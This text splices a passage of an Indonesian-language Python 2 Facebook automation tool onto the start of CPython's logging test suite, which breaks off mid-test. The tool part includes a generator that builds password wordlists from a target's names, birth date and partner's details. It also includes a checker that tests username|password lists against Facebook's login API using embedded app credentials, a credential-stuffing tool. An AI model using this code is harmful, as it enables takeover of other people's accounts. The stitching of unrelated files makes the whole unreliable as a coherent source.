except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit=raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r=requests.get('https://graph.facebook.com/me/friendrequests?limit=' +
limit + '&access_token=' + toket)
teman=json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] There is nothing permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas=requests.post('https://graph.facebook.com/me/friends/' +
i['from']['id'] + '?access_token=' + toket)
a=json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
cok=json.loads(pek.text)
for i in cok['data']:
nama=i['name']
id=i['id']
requests.delete(
'https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Back'
print
select_lain()
def select_lain():
other=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
select_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mThere is nothing'
select_lain()
def status():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg=raw_input(
'\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res=requests.get(
'https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op=json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file=open(a + '.txt', 'w')
b=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e=raw_input(
'\x1b[1;91m[+] \x1b[1;92mDate of birth >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f=e[0:2]
g=e[2:4]
h=e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j=raw_input(
'\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k=raw_input(
'\x1b[1;91m[+] \x1b[1;92mDate of birth Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (
a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg=0
while wg < 100:
wg=wg + 1
file.write(a + str(wg) + '\n')
en=0
while en < 100:
en=en + 1
file.write(i + str(en) + '\n')
word=0
while word < 100:
word=word + 1
file.write(d + str(word) + '\n')
gen=0
while gen < 100:
gen=gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live=[]
cek=[]
die=[]
try:
file=raw_input(
'\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list=open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah=raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password=meki.strip().split(str(pemisah))
url='https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
username + '&locale=en_US&password=' + password +
'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data=requests.get(url)
mpsh=json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh=requests.get(
'https://graph.facebook.com/me/groups?access_token=' + toket)
gud=json.loads(uh.text)
for p in gud['data']:
nama=p['name']
id=p['id']
f=open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Back'
print
g=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif='true'
gaz(toket, aktif)
else:
if g == '2':
non='false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url='https://graph.facebook.com/me?access_token=%s' % toket
res=requests.get(url)
uid=json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id=get_userid(toket)
data='variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (
enable, str(id))
headers={'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'OAuth %s' % toket}
url='https://graph.facebook.com/graphql'
res=requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
test_logging.py
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
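# A minimal illustrative sketch (not used by the tests below; the logger name is
# hypothetical) of how the names above get registered and used. The suite itself
# performs the registration in CustomLevelsAndFiltersTest.setUp.
def _demo_custom_levels():
    for _level, _name in my_logging_levels.items():
        logging.addLevelName(_level, _name)
    demo_logger = logging.getLogger("demo.custom_levels")
    demo_logger.setLevel(VERBOSE)
    # At or above VERBOSE (115), so this record passes and renders as 'Sociable'.
    demo_logger.log(SOCIABLE, "sociable message")
    # TALKATIVE (114) is below the logger's level, so this record is dropped.
    demo_logger.log(TALKATIVE, "talkative message")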
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
